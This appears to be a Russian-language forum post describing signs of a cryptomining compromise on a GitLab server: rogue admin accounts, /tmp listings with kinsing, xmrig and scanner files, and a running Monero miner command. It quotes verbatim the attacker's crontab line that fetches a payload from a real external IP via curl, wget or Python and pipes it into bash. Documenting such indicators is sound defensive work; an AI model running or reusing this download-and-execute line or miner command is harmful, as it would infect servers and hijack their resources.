Может так произойти что при входе в админку gitlab'a вы можете обнаружить неизвестные аккаунты с админскими правами.
Так же при входе на сервер по ssh вы можете заметить неизвестные процессы которые потребляют большое кол-во ресурсов CPU и памяти (вляются по факту майнерами).
Если посмотреть в crontab можно найти подозрительные записи планировщика, суть которых скачать вирус с удалённой машины на текущий сервер и запустить его, например:
И наличие неизвестных файлов в папке /tmp
или
Среди процессов могут быть следующие примеры:
Так же при входе на сервер по ssh вы можете заметить неизвестные процессы которые потребляют большое кол-во ресурсов CPU и памяти (вляются по факту майнерами).
Если посмотреть в crontab можно найти подозрительные записи планировщика, суть которых скачать вирус с удалённой машины на текущий сервер и запустить его, например:
Код:
root@gitlab:/var/spool/cron# cat crontabs/git
* * * * * (curl -fsSL http://194.38.20.31/xms||wget -q -O- http://194.38.20.31/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://194.38.20.31/xms").read()')| bash -sh; lwp-download http://194.38.20.31/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xmsИ наличие неизвестных файлов в папке /tmp
Код:
root@gitlab:/tmp# ls -al
total 13684
drwxrwxrwt 20 root root 4096 Nov 4 12:47 .
drwxr-xr-x 18 root root 4096 Oct 25 06:44 ..
-rwxr-xr-x 1 git git 964576 Nov 4 05:36 1
-rw-r--r-- 1 git git 168 Nov 4 12:03 b8ffdc.sh
-rw-r--r-- 1 git git 42 Nov 4 10:57 b8ffdc.tmp
-rwxr-xr-x 1 git git 2528860 Nov 4 09:17 dbused
drwxrwxrwt 2 root root 4096 Oct 25 06:44 .font-unix
-rwxr-xr-x 1 git git 899800 Nov 4 11:05 hxx
drwxrwxrwt 2 root root 4096 Oct 25 06:44 .ICE-unix
-rw-r--r-- 1 git git 0 Nov 3 21:27 .lock
-rwxr-xr-x 1 git git 99728 Nov 4 12:41 pas
drwx------ 2 git git 4096 Nov 1 09:44 prometheus-mmap20211101-2065891-1i2ix0n
drwx------ 2 git git 4096 Nov 1 09:45 prometheus-mmap20211101-2066194-13wckwp
drwx------ 2 git git 4096 Nov 1 09:45 prometheus-mmap20211101-2066506-aic3vk
drwx------ 2 git git 4096 Nov 2 01:18 prometheus-mmap20211102-2644502-11g0jvw
drwx------ 2 git git 4096 Nov 2 01:18 prometheus-mmap20211102-2644588-1v3n9bl
drwx------ 2 git git 4096 Nov 2 01:18 prometheus-mmap20211102-2644657-1l6vrb5
drwx------ 2 git git 4096 Nov 2 01:18 prometheus-mmap20211102-2644723-1ikprog
drwx------ 2 git git 4096 Nov 4 07:54 prometheus-mmap20211104-442117-1wo9es1
-rwxr-xr-x 1 git git 20762 Nov 4 12:41 pscan
drwxr-xr-x 2 git git 4096 Nov 4 09:17 .pwn
-rw-r--r-- 1 git git 0 Nov 4 12:41 ranges
-rw-r--r-- 1 git git 0 Nov 4 12:41 ranges.txt
-rwxr-xr-x 1 git git 718500 Nov 4 12:41 scan2
-rwxr-xr-x 1 git git 4539 Nov 4 12:47 ssh_vulnnew.txt
drwx------ 3 root root 4096 Oct 25 06:44 systemd-private-1beb929714ed4a3dbb801ba4d83d61c1-systemd-logind.service-nxcqXi
drwx------ 3 root root 4096 Oct 25 06:44 systemd-private-1beb929714ed4a3dbb801ba4d83d61c1-systemd-resolved.service-O2mFej
drwx------ 3 root root 4096 Oct 25 06:44 systemd-private-1beb929714ed4a3dbb801ba4d83d61c1-systemd-timesyncd.service-T4wbQg
drwxrwxrwt 2 root root 4096 Oct 25 06:44 .Test-unix
-rw-r--r-- 1 git git 12242 Nov 4 02:31 tmp.sh
drwxr-xr-x 2 git git 4096 Nov 4 09:09 .x
drwxrwxrwt 2 root root 4096 Oct 25 06:44 .X11-unix
drwxrwxrwt 2 root root 4096 Oct 25 06:44 .XIM-unix
-rw-r--r-- 1 git git 6139904 May 31 08:31 xmrig-6.12.2-linux-static-x64.tar
-rw-r--r-- 1 git git 2498956 May 31 08:31 xmrig-6.12.2-linux-static-x64.tar.gz
-rw-r--r-- 1 git git 12208 Nov 3 10:34 xmsили
Код:
root@ubuntu-4gb-hel1-1:/tmp# ls -al
total 43072
drwxrwxrwt 41 root root 4096 Nov 4 16:07 .
drwxr-xr-x 23 root root 4096 Jul 8 2019 ..
-rwxr-xr-x 1 git git 964576 Nov 4 05:41 1
-rwxrwxrwx 1 git git 188716 Nov 3 23:32 bashirc
-rw-r--r-- 1 git git 167 Nov 4 12:58 bfdbd6.sh
-rw-r--r-- 1 git git 5734 Nov 4 08:43 bfdbd6.tmp
drwx------ 2 root crontab 4096 Dec 5 2020 crontab.mq0hRp
-rwxr-xr-x 1 git git 2528860 Nov 3 23:32 dbused
drwxrwxrwt 2 root root 4096 Jul 8 2019 .font-unix
drwxr-xr-x 2 git git 4096 Nov 4 07:16 .fsdfjsdf
drwxr-xr-x 3 git git 4096 Nov 4 08:04 .fsdjfsdifwrwe
drwx------ 2 git git 4096 Nov 4 14:44 gitaly-ruby174704834
-rw-r--r-- 1 git git 0 Nov 4 14:57 .gitlnk
-rwxrwxrwx 1 git git 179608 Nov 4 14:21 hh
-rwxr-xr-x 1 git git 6983172 Nov 4 11:13 httpd
-rwxrwxrwx 1 git git 899800 Nov 4 13:39 hxx
drwxr-xr-x 2 git git 4096 Nov 4 14:47 .ICEd-unix
drwxrwxrwx 3 git git 4096 Nov 4 14:31 .ice-unix
drwxrwxrwt 2 root root 4096 Jul 8 2019 .ICE-unix
-rw-r--r-- 1 git git 0 Nov 4 13:39 ips.check
-rwxr-xr-x 1 git git 2 Nov 4 16:00 kdevtmpfsi
-rwxrwxrwx 1 git git 14643200 Nov 4 14:44 kinsing
-rwxrwxrwx 1 git git 26800 Nov 4 14:44 libsystem.so
-rw-r--r-- 1 git git 0 Nov 3 23:32 .lock
-rwxrwxrwx 1 git git 42196 Nov 4 16:00 .newinit.sh
drwxr-xr-x 3 git git 4096 Nov 4 15:46 .nuiwfueutwe
-rwxrwxrwx 1 git git 99728 Nov 4 13:39 pas
drwx------ 2 git git 4096 Dec 8 2019 prometheus-mmap20191208-10808-1wcn570
drwx------ 2 git git 4096 Dec 8 2019 prometheus-mmap20191208-13197-1rhvsza
drwx------ 2 git git 4096 Dec 8 2019 prometheus-mmap20191208-14112-g0qkwq
drwx------ 2 git git 4096 Dec 8 2019 prometheus-mmap20191208-21087-1323199
drwx------ 2 git git 4096 Dec 8 2019 prometheus-mmap20191208-9808-1hz8z5l
drwx------ 2 git git 4096 Dec 8 2019 prometheus-mmap20191208-9918-iops2f
drwx------ 2 git git 4096 Dec 8 2019 prometheus-mmap20191208-9953-12guj7p
drwx------ 2 git git 4096 Aug 13 07:48 prometheus-mmap20210813-3066-185ef04
drwx------ 2 git git 4096 Aug 13 06:58 prometheus-mmap20210813-30917-1bgwgnk
drwx------ 2 git git 4096 Aug 13 06:59 prometheus-mmap20210813-31050-zq3jl7
drwx------ 2 git git 4096 Aug 13 07:48 prometheus-mmap20210813-3144-1iijw6q
drwx------ 2 git git 4096 Sep 3 09:46 prometheus-mmap20210903-6560-p0wt31
drwx------ 2 git git 4096 Sep 3 09:47 prometheus-mmap20210903-6731-1hylx6u
drwx------ 2 git git 4096 Nov 2 01:07 prometheus-mmap20211102-30371-ohd4qg
drwx------ 2 git git 4096 Nov 2 01:07 prometheus-mmap20211102-30393-yzg3x6
drwx------ 2 git git 4096 Nov 2 01:28 prometheus-mmap20211102-31966-1httr3d
drwx------ 2 git git 4096 Nov 2 01:28 prometheus-mmap20211102-31989-1cv1mar
drwx------ 2 git git 4096 Nov 4 08:43 prometheus-mmap20211104-20078-ug084w
-rwxr-xr-x 1 git git 20762 Nov 4 12:41 pscan
drwxr-xr-x 2 git git 4096 Nov 3 23:32 .pwn
-rw-r--r-- 1 git git 0 Nov 3 23:32 .python
-rw-r--r-- 1 git git 0 Nov 4 12:41 ranges
-rw-r--r-- 1 git git 0 Nov 4 12:41 ranges.txt
-rwxrwxrwx 1 git git 20762 Nov 4 00:09 scan
-rwxrwxrwx 1 git git 718500 Nov 4 13:39 scan2
-rw-r--r-- 1 git git 1725244 Nov 4 00:33 scan.log
-rw-r--r-- 1 root root 5933 Jul 8 2019 script.deb.sh
-rw-r--r-- 1 git git 205254 Nov 4 00:33 sshcheck
-rw-r--r-- 1 git git 1019273 Nov 4 00:33 ssh_vuln.txt
-rw-r--r-- 1 git git 0 Nov 4 16:00 svcguard
-rw-r--r-- 1 git git 0 Nov 4 16:00 svcupdate
drwx------ 3 root root 4096 Nov 4 14:53 systemd-private-f5c2ddd926bd4116afd80cd44ab166ba-systemd-resolved.service-vFi08C
drwx------ 3 root root 4096 Jul 8 2019 systemd-private-f5c2ddd926bd4116afd80cd44ab166ba-systemd-timesyncd.service-f6vlyx
drwx------ 3 git git 4096 Nov 4 11:13 Temp-9300b850-0f66-49c0-9012-6ad95d47119a
drwxrwxrwt 2 root root 4096 Jul 8 2019 .Test-unix
drwx------ 2 root root 4096 Dec 8 2019 tmpktcg1uvi
-rw-r--r-- 1 git git 12242 Nov 2 10:44 tmp.sh
drwx------ 2 root root 4096 Jul 8 2019 tmux-0
drwxr-xr-x 2 git git 4096 Nov 2 12:52 .x
drwxrwxrwt 2 root root 4096 Jul 8 2019 .X11-unix
drwx------ 4 git git 4096 Nov 4 13:57 .xdiag
drwxrwxrwt 2 root root 4096 Jul 8 2019 .XIM-unix
drwxr-xr-x 2 git git 4096 May 31 08:08 xmrig-6.12.2
-rw-r--r-- 1 git git 6139904 May 31 08:31 xmrig-6.12.2-linux-static-x64.tar
-rw-r--r-- 1 git git 12208 Nov 3 10:34 xms
-rwxrwxrwx 1 git git 7432520 Nov 4 14:31 .zsh
-rw-r--r-- 1 git git 7 Nov 4 16:00 .zshsСреди процессов могут быть следующие примеры:
Код:
git 5540 65.0 54.1 2942108 2134568 ? Ssl 16:00 52:45 ./.zsh --log-file=/etc/.etc --donate-level 0 --keepalive --no-color --cpu-priority 5 -o 80.211.206.105:9000 -u clean -p x -k --coin monero --background